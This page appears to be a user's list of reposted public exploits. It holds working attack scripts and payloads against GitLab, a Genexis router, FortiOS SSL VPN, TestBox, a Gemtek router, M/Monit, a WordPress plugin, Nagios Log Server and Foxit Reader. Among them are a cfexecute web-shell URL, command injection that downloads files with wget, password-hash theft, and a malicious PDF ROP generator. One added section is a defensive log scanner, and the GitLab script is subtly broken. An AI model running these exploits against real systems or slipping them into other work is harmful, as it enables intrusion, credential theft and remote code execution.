
Everything posted by HireHackking
-
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
# Google Dork: -
# Date: 11/15/2020
# Exploit Author: Jasper Rasenberg
# Vendor Homepage: https://about.gitlab.com
# Software Link: https://about.gitlab.com/install
# Version: tested on gitlab version 12.9.0
# Tested on: Kali Linux 2020.3

# You can create as many personal access tokens as you like from your GitLab profile.
# Sign in to GitLab.
# In the upper-right corner, click your avatar and select Settings.
# On the User Settings menu, select Access Tokens.
# Choose a name and optional expiry date for the token.
# Choose the desired scopes.
# Click the Create personal access token button.
# Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one.
# REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

# pip3 install gitlab
# pip3 install requests
# Use a client cert to verify SSL or set to False

import os
import requests
import json
from time import sleep
from gitlab import *

session = requests.Session()
session.verify = f'{os.getcwd()}/<cert.pem>'  # or set session.verify = False
host = ''


def exploit(projectName, issueTitle, files, token):
    gl = Gitlab(host, private_token=token, session=session)
    gl.auth()
    p1 = gl.projects.create({'name': f"{projectName}-1"})
    p2 = gl.projects.create({'name': f"{projectName}-2"})
    for i, f in enumerate(files):
        stripped_f = f.rstrip('\n')
        issue = p1.issues.create({
            'title': f"{issueTitle}-{i}",
            'description': ""})
        print(issue.description)
        sleep(3)
        try:
            issue.move(p2.id)
        except Exception as e:
            pass
        sleep(3)


if __name__ == "__main__":
    write_files = ['/etc/passwd', '~/.ssh/id_rsa']
    with open('senstive_files', 'w') as sens:
        for file in write_files:
            sens.write(file)
    files = list(open('sensitive_files', 'r'))
    exploit('project-1', 'issue-1', files)
-
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
# Date: 17th November 2020
# Exploit Author: Nitesh Surana
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Version: P4410-V2-1.34H
# Tested on: Windows/Kali
# CVE : CVE-2020-25988

import upnpy

upnp = upnpy.UPnP()

# Discover UPnP devices on the network
# Returns a list of devices e.g.: [Device <Econet IGD>]
devices = upnp.discover()

# Select the device directly from the list
device = devices[0]

# Get the services available for this device
# Returns a list of services available for the device
# device.get_services()

# We can now access a specific service on the device by its ID like a dictionary
service = device['DeviceInfo1']

# Execute the action by its name (in our case, the 'X_GetAccess' action)
# Returns a dictionary containing the cleartext password of 'admin' user.
print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))
-
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
# Google Dork: intitle:"Please Login" "Use FTM Push"
# Date: 15/11/2020
# Exploit Author: Ricardo Longatto
# Details: This exploit allows changing a user's password from the SSLVPN web portal
# Vendor Homepage: https://www.fortinet.com/
# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10.
# Tested on: 6.0.4
# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382
# CVE : CVE-2018-13382
# Credits: Vulnerability by Meh Chang and Orange Tsai.

#!/usr/bin/env python

import requests, urllib3, sys, re, argparse

urllib3.disable_warnings()

menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
menu.add_argument('-t', metavar='Target/Host IP', required=True)
menu.add_argument('-p', metavar='Port', required=True)
menu.add_argument('-u', metavar='User', required=True)
menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d')
op = menu.parse_args()

host = op.t
port = op.p
user = op.u
setpass = op.setpass

url = "https://"+host+":"+port+"/remote/logincheck"
exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass}

r = requests.post(url, verify=False, data = exploit)

if re.search("/remote/hostcheck_install",r.text):
    print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]"
else:
    print "Exploit Failed. :/"
-
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.4.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.

Command Injection & RCE
------------------------
The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host. The block below shows the vulnerable code:

HTMLRunner.cfm, lines 51-73:

// Write TEST.properties in report destination path.
if( url.propertiesSummary ){
    testResult = testbox.getResult();
    errors = testResult.getTotalFail() + testResult.getTotalError();
    savecontent variable="propertiesReport"{
        writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) );
        writeOutput( "test.labels=#arrayToList( testResult.getLabels() )#
        test.bundles=#URL.bundles#
        test.directory=#url.directory#
        total.bundles=#testResult.getTotalBundles()#
        total.suites=#testResult.getTotalSuites()#
        total.specs=#testResult.getTotalSpecs()#
        total.pass=#testResult.getTotalPass()#
        total.fail=#testResult.getTotalFail()#
        total.error=#testResult.getTotalError()#
        total.skipped=#testResult.getTotalSkipped()#" );
    }
    //ACF Compatibility - check for and expand to absolute path
    if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath );
    fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport );
}

If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed.

The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application.

The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and not sanitized, allowing arbitrary CFML tags and script to be passed to the code.

When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server.

(Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.)

Sample URL to write local CFM file:
http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre>

Sample URL to confirm:
http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all

Versions Affected
------------------------
Versions affected (and platform tested on):
- Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
- Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)

Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
-
TestBox CFML Test Framework 4.1.0 - Directory Traversal
# Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.3.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.

Directory Traversal
------------------------
The TestBox "test-browser" page does not adequately sanitise the "path" QueryString parameter, allowing an attacker to perform a directory traversal on the page by specifying the value "path=/../" (appending '../' all the way up to the system root).

Sample URL:
http://<HOST>/testbox/test-browser/index.cfm?path=/../

Versions Affected
------------------------
Versions affected (and platform tested on):
- Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
- Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)

Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
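As an added defensive example (not part of either TestBox advisory), the following Python scans web-server access-log lines for the request shapes both advisories describe: HTMLRunner.cfm called with propertiesSummary and a propertiesFilename that is not a .properties file, a reportpath containing "..", markup in labels, a later hit on an unexpected .cfm under the runners directory, and a "path" traversal against test-browser. The log lines are constructed, the rule names are my own, and the "/testbox" prefix and the runner allow-list are assumptions to adjust per deployment.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined format); not taken from the advisories.
# Targets follow the URL shapes both TestBox advisories describe.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jul/2020:10:01:02 +0000] "GET /testbox/system/runners/HTMLRunner.cfm?directory=tests.specs&reporter=simple HTTP/1.1" 200 5120
10.0.0.9 - - [23/Jul/2020:10:01:07 +0000] "GET /testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=%3Cpre%3E%3Ccfexecute%20name%3D%22x%22%3E HTTP/1.1" 200 812
10.0.0.9 - - [23/Jul/2020:10:01:09 +0000] "GET /testbox/system/runners/exec.cfm?cmd=whoami HTTP/1.1" 200 301
10.0.0.7 - - [23/Jul/2020:10:02:15 +0000] "GET /testbox/test-browser/index.cfm?path=/../ HTTP/1.1" 200 9901
10.0.0.5 - - [23/Jul/2020:10:03:00 +0000] "GET /testbox/test-browser/index.cfm?path=/specs HTTP/1.1" 200 4400
10.0.0.5 - - [23/Jul/2020:10:04:00 +0000] "GET /testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&propertiesFilename=TEST.properties&reportpath=/reports HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumption: only HTMLRunner.cfm is expected under the runners directory in a
# stock TestBox install; extend this set if your deployment ships more runners.
KNOWN_RUNNERS = {"htmlrunner.cfm"}


def analyze_request(target: str) -> list:
    """Return the rule names a single request target trips (empty list if clean)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # CFML's url scope is case-insensitive, so normalise parameter names. Values
    # are decoded a second time so double-encoded '..' or '<' do not slip past.
    query = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}

    def first(name: str) -> str:
        return unquote(query.get(name, [""])[0])

    rules = []
    if not path.startswith("/testbox/"):
        return rules

    if path == "/testbox/system/runners/htmlrunner.cfm":
        if first("propertiessummary").lower() in ("true", "1", "yes"):
            fname = first("propertiesfilename")
            if fname and not fname.lower().endswith(".properties"):
                rules.append("testbox-properties-file-write")    # extension chosen by the client
            if ".." in first("reportpath"):
                rules.append("testbox-reportpath-traversal")
            if "<" in first("labels"):
                rules.append("testbox-labels-markup-injection")  # labels land in the written file
    elif path.startswith("/testbox/system/runners/") and path.endswith(".cfm"):
        if path.rsplit("/", 1)[-1] not in KNOWN_RUNNERS:
            rules.append("testbox-unexpected-runner-script")     # possibly a file written earlier

    if path.startswith("/testbox/test-browser/") and ".." in first("path"):
        rules.append("testbox-test-browser-traversal")
    return rules


def analyze_log(text: str) -> list:
    """Parse combined-format lines and return (ip, rule, target) findings in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in analyze_request(m["target"]):
            findings.append((m["ip"], rule, m["target"]))
    return findings


if __name__ == "__main__":
    for ip, rule, target in analyze_log(SAMPLE_LOG):
        print(f"{ip:<10} {rule:<36} {target}")
```

Any hit under /testbox/ on a production host is itself worth an alert, since the vendor states the framework is not meant to be deployed there; the rules above only rank which hits to look at first.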
-
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
# Date: 13/09/2020
# Exploit Author: Gabriele Zuddas
# Version: 01.01.02.127, 01.01.02.141
# CVE : CVE-2020-24365

"""
Service Provider : Linkem
Product Name : LTE CPE
Model ID : WVRTM-127ACN
Serial ID : GMK170418011089
IMEI : XXXXXXXXXXXXX
ICCID : XXXXXXXXXXXXXXXXXX
Firmware Version : 01.01.02.141
Firmware Creation Date : May 15 13:04:30 CST 2019
Bootrom Version : U-Boot 1.1.3
Bootrom Creation Date : Oct 23 2015 - 16:03:05
LTE Support Band : 42,43

Injecting happens here:
sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&

Exploit has been tested on older versions too:
Firmware Version: 01.01.02.127
Firmware Creation Date : May 23 15:34:10 CST 2018
"""

import requests, time, argparse, re, sys


class Exploit():
    CVE = "CVE-2020-24365"

    def __init__(self, args):
        self.args = args
        self.session = requests.Session()

    def login(self):
        s = self.session
        r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
        if "sid" not in s.cookies:
            print("[!] Login failed.")
            exit(1)
        sid = s.cookies["sid"]
        s.headers = {"sid": sid}
        print(f"[*] Login successful! (sid={sid})")

    def now(self):
        return int(time.time() * 1000)

    def exploit(self, command):
        self.login()
        with self.session as s:
            payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")
            #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
            r = s.get(payload)
            r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")
            content = str(r.content, "utf8")
            #TODO: eventually parse content with regex to clean out the output
            c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
            print(content)
            if len(c) > 0:
                print(c[0])
                return c[0]
            else:
                return False

    def download_file(self, url):
        filename = url.rsplit('/', 1)[-1]
        if self.args.file is not None:
            print(f"[*] Attempting download of file '(unknown)' from {url} ...")
            if self.exploit(f"wget {url} -O /tmp/(unknown)"):
                print(f"[*] File saved on {self.args.target}'s /tmp/(unknown).")
                print(self.exploit(f"du -h /tmp/(unknown)"))
                return True
            else:
                print(f"[!] Failed to download (unknown) from {url}")
                return False

    def run(self):
        if self.args.command is not None:
            print(self.exploit(self.args.command))
            exit()
        if self.args.file is not None:
            self.download_file(self.args.file)
            exit()


if __name__ == "__main__":
    # Create the parser and add arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")
    args = parser.parse_args()
    # Run exploit
    X = Exploit(args)
    if len(sys.argv) > 1:
        print(f"[*] Exploiting {X.CVE} ...")
        X.run()
    else:
        parser.print_help(sys.stderr)
-
M/Monit 3.7.4 - Privilege Escalation
# Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(url)  # initial GET so the session picks up its cookie


def login():
    print('Attempting to login...')
    data = {
        'z_username':username,
        'z_password':password
    }
    headers = {
        'Content-Type':'application/x-www-form-urlencoded'
    }
    resp = sess.post(url + '/z_security_check', data=data, headers=headers)
    if resp.ok:
        print('Logged in successfully.')
    else:
        print('Could not login.')
        sys.exit(1)


def privesc():
    data = {
        'uname':username,
        'fullname':username,
        'password':password,
        'admin':1
    }
    resp = sess.post(url + '/api/1/admin/users/update', data=data)
    if resp.ok:
        print('Escalated to administrator.')
    else:
        print('Unable to escalate to administrator.')
    return


if __name__ == '__main__':
    login()
    privesc()
-
M/Monit 3.7.4 - Password Disclosure
# Title: M/Monit 3.7.4 - Password Disclosure
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(url)  # initial GET so the session picks up its cookie


def login():
    print('Attempting to login...')
    data = {
        'z_username':username,
        'z_password':password
    }
    headers = {
        'Content-Type':'application/x-www-form-urlencoded'
    }
    resp = sess.post(url + '/z_security_check', data=data, headers=headers)
    if resp.ok:
        print('Logged in successfully.')
    else:
        print('Could not login.')
        sys.exit(1)


def steal_hashes():
    resp = sess.get(url + '/api/1/admin/users/list')
    if resp.ok:
        for i in resp.json():
            mmonit_user = i['uname']
            result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user))
            mmonit_passw = result.json()['password']
            print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))


if __name__ == '__main__':
    login()
    steal_hashes()
-
Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
# Google Dork: N/A
# Date: 2020-08-24
# Vendor Homepage: https://accesspressthemes.com
# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
# Version: <= 1.7.9
# Tested on: Ubuntu 18.04

Description:
A blind SQL injection vulnerability is present in Ajax load more.

<?php
$si_id = esc_attr($atts['id']);
global $wpdb;
$table_name = $table_name = $wpdb->prefix . "aps_social_icons";
$icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id = $si_id");

POC:

POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user HTTP/1.1
Host: pwnme.me
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit
X-WP-Nonce: 514cd2ab3f
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://pwnme.me
Content-Length: 103
Connection: close
Cookie: wp-settings-time-2=1597912773; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79; wp-settings-time-3=1598234126

{"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and sleep(5)\"]\n<!-- /wp:shortcode -->"}
-
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
# Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting
# Date: 31.08.2020
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://www.nagios.com/
# Software Link: https://www.nagios.com/products/nagios-log-server/
# Version: 2.1.7
# Tested on: Linux/ISO
# Link: https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

# Description
A stored cross-site scripting (XSS) in Nagios Log Server 2.1.7 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page.

# PoC
To exploit vulnerability, someone could use a POST request to '/nagioslogserver/configure/create_snapshot' by manipulating 'snapshot_name' parameter in the request body to impact users who open a maliciously crafted link or third-party web page.

POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD]
-
Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
# Date: 2020-08-29
# Exploit Author: CrossWire
# Vendor Homepage: https://www.foxitsoftware.com/
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: 9.0.1.1049
# Tested on: Microsoft Windows Server 2016 10.0.14393
# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)

#!/usr/bin/python3
'''
===========================================================================
| PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958)    |
===========================================================================
| Written by: Kevin Dorland (CrossWire)                                   |
| Date: 08/29/2020                                                        |
|                                                                         |
| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |
|                                                                         |
| References:                                                             |
| https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC)   |
| https://www.exploit-db.com/exploits/45269 (Metasploit adaptation)       |
|                                                                         |
===========================================================================
'''

PDF_TEMPLATE = '''
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (

var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];

function prepare_heap(size){
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
        arr[i] = this.addAnnot({type: "Text"});;
        if (typeof arr[i] == "object"){
            arr[i].destroy();
        }
    }
}

function gc() {
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

function alloc_at_leak(){
    for (var i = 0; i < 0x64; i++){
        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
}

function control_memory(){
    for (var i = 0; i < 0x64; i++){
        for (var j = 0; j < pwn_array[i].length; j++){
            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
        }
    }
}

function leak_vtable(){
    var a = this.addAnnot({type: "Text"});
    a.destroy();
    gc();
    prepare_heap(0x400);
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    var leaked = stolen[0] & 0xffff0000;
    foxit_base = leaked - 0x01f50000;
}

function leak_heap_chunk(){
    var a = this.addAnnot({type: "Text"});
    a.destroy();
    prepare_heap(0x400);
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    alloc_at_leak();
    heap_ptr = stolen[1];
}

function reclaim(){
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);
        rop[0x00] = heap_ptr;                 // pointer to our stack pivot from the TypedArray leak
        rop[0x01] = foxit_base + 0x01a11d09;  // xor ebx,ebx; or [eax],eax; ret
        rop[0x02] = 0x72727272;               // junk
        rop[0x03] = foxit_base + 0x00001450   // pop ebp; ret
        rop[0x04] = 0xffffffff;               // ret of WinExec
        rop[0x05] = foxit_base + 0x0069a802;  // pop eax; ret
        rop[0x06] = foxit_base + 0x01f2257c;  // IAT WinExec
        rop[0x07] = foxit_base + 0x0000c6c0;  // mov eax,[eax]; ret
        rop[0x08] = foxit_base + 0x00049d4e;  // xchg esi,eax; ret
        rop[0x09] = foxit_base + 0x00025cd6;  // pop edi; ret
        rop[0x0a] = foxit_base + 0x0041c6ca;  // ret
        rop[0x0b] = foxit_base + 0x000254fc;  // pushad; ret
        //Path to executable
        <PATH TO EXECUTABLE>
        //End Path to executable
        rop[0x17] = 0x00000000;               // adios, amigo
    }
}

function trigger_uaf(){
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{
            get: function () {
                that.getAnnot(0, "uaf").destroy();
                reclaim();
                return 1;
            }
        }
    });
    a.point = arr;
}

function main(){
    leak_heap_chunk();
    leak_vtable();
    control_memory();
    trigger_uaf();
}

if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
        if (app.appFoxitVersion == "9.0.1.1049"){
            main();
        }
    }
}
)>>
trailer
<</Root 1 0 R>>
'''

import sys

#Enforces 2 hex char byte notation. "0" becomes "0x00"
def format_byte(b):
    if (len(b) > 2) and (b[0:2] == '0x'):
        b = b[2:]
    if len(b) == 1:
        b = '0' + b
    return '0x' + b

def char2hex(c):
    return format_byte(hex(ord(c)))

#Converts file path into array of eleven 32-bit hex words
def path_to_machine_code(path,little_endian = True):
    print("[+] Encoding Path:",path)
    #ensure length
    if len(path) > 44:
        print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
        exit(-1)
    #Copy path into 4 character (32 bit) words (max 11)
    word_array = []
    for i in range(11):
        word = ''
        if len(path):
            word += path[0:4] if len(path) >= 4 else path
            path = path[len(word):]
        if len(word) < 4:
            word += chr(0) * (4 - len(word))
        word_array.append(word)
    #Convert chars to hex values and format to "0xAABBCCDD" notation
    hex_array = []
    for word in word_array:
        #Reverse byte order to fit little endian standard
        if(little_endian):
            word = word[::-1]
        #Write bytes to hex strings
        hex_string = '0x'
        for char in word:
            hex_string += char2hex(char)[2:] #strip the 0x off the byte here
        hex_array.append(hex_string)
    return hex_array

#writes encoded path to rop array to match template
def create_rop(hex_arr, start_index = '0c'):
    ord_array = []
    index = int(start_index,16)
    for instruction in hex_arr:
        full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"
        ord_array.append(full_instruction)
        index += 1
    return ('\n'.join(ord_array))

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")
        print("-- EXAMPLES --")
        print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")
        exit(-1)
    #Parse user args
    EXE_PATH = sys.argv[1]
    PDF_PATH = sys.argv[2]
    #Generate hex
    raw_hex = path_to_machine_code(EXE_PATH)
    print("[+] Machine Code:")
    for hex_word in raw_hex:
        print(hex_word)
    ord_string = create_rop(raw_hex)
    print("[+] Instructions to add:")
    print(ord_string)
    print("[+] Generating pdf...")
    print("\t- Filling template...")
    evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)
    print("\t- Writing file...")
    with open(PDF_PATH,'w') as fd:
        fd.write(evil_pdf)
    print("[+] Generated pdf:",PDF_PATH)
-
ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
# Date: 2020-08-22
# Exploit Author: Vyshnav NK
